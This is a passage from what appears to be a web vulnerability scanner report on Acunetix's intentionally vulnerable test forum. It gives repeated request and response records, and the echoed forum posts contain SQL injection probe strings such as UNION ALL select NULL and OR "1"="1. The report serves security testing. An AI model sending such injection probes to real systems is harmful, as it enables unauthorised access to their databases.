name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4149 |
| Response Body - size: 4,149 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 